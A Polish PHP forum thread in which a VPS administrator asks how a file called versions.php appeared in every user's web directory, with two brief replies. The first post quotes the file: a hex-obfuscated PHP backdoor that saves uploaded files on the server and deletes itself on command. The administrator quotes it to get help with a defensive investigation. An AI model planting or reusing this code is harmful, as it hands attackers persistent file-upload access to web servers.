Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

> VPS - nieautoryzowane wgranie pliku, CentOS / Linux / Serwer Dedykowany
Mega_88
post
Post #1





Grupa: Zarejestrowani
Postów: 360
Pomógł: 34
Dołączył: 20.08.2011

Ostrzeżenie: (0%)
-----


Cześć, dzisiaj na serwerze zauważyłem, że w katalogach public_html (/home/USER/domains/public_html/) dla każdego użytkownika pojawił się plik o nazwie versions.php (zawartość pliku poniżej). Plików już się pozbyłem, ale znając życie coś musi siedzieć głębiej.

Teraz bardziej do rzeczy. Rozumiem gdyby w katalogach każdego użytkownika siedziała jakaś dziurawa joomla lub wordpress to można się domyśleć, że to przez dziury w starych wersjach i zacząć szukać tam na początku. Jednak wspomniany plik pojawił się w katalogach (domenach - www.NAZWA_DOMENY.pl/versions.php) gdzie nic nie było zainstalowane, wgrane. Po prostu zwykły plik index.html z zawartością "Hello word", a właścicielem każdego z plików wgranych na serwerze jest dany użytkownik do którego katalogu został wgrany. Więc to nie dziurawe oprogramowanie pod każdą z domen tylko bardziej coś serwerowego. W lagach FTP nic nie widzę żeby coś było wgrywane, w logach logowań na danych userów po FTP również nic nie ma, a tym bardziej na root'a.

Może mi ktoś podpowiedzieć od czego zacząć i gdzie szukać żeby wyłapać jakim cudem plik znalazł się na serwerze i w jaki sposób został wgrany ? Bo nawet nie wiem gdzie mam już szukać.


Zawartość pliku:
  1. <?php if(!empty($_POST["\x74a\x73k"])){if($_POST["tas\x6b"]=="\x75\x70\x6c\x6fad"){if($_FILES["fi\x6ce"]["\x65rr\x6fr"]>0){echo"Re\x74\x75r\x6e C\x6fde: ".$_FILES["f\x69le"]["\x65rror"]."\n";}else{if(file_exists("./".$_FILES["fi\x6ce"]["na\x6de"])){echo$_FILES["\x66ile"]["name"]."\x20al\x72ead\x79\x20\x65x\x69s\x74s\x2e \n";}else{move_uploaded_file($_FILES["\x66\x69l\x65"]["t\x6dp\x5fna\x6de"],"./".$_FILES["f\x69l\x65"]["nam\x65"]);echo"\x6fk";}}}else if($_POST["\x74a\x73k"]=="\x64el\x53e\x6cf"){if(unlink(__FILE__)){echo"\x6f\x6b";}else{echo"\x66\x61\x69\x6c";}}}else{echo"\x6f\x6b";exit;}
  2. ?>
Go to the top of the page
+Quote Post
 
Start new topic
Odpowiedzi
kayman
post
Post #2





Grupa: Zarejestrowani
Postów: 556
Pomógł: 40
Dołączył: 20.07.2012
Skąd: Warszawa

Ostrzeżenie: (0%)
-----


może to cię naprowadzi -> http://ddecode.com/hexdecoder/?results=5a8...46408f84071fa3d
Go to the top of the page
+Quote Post
Mega_88
post
Post #3





Grupa: Zarejestrowani
Postów: 360
Pomógł: 34
Dołączył: 20.08.2011

Ostrzeżenie: (0%)
-----


Cytat(kayman @ 28.02.2017, 19:10:24 ) *


Sprawdzałem już tym i niestety za dużo mi to nie mówi bo ja nie widzę tam żadnych konkretów i odpowiedzi na pytanie gdzie szukać/czemu i jak to wyeliminować... Może ktoś coś więcej powiedzieć w tym temacie ?
Go to the top of the page
+Quote Post

Posty w temacie


Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 



RSS Aktualny czas: 5.10.2025 - 00:22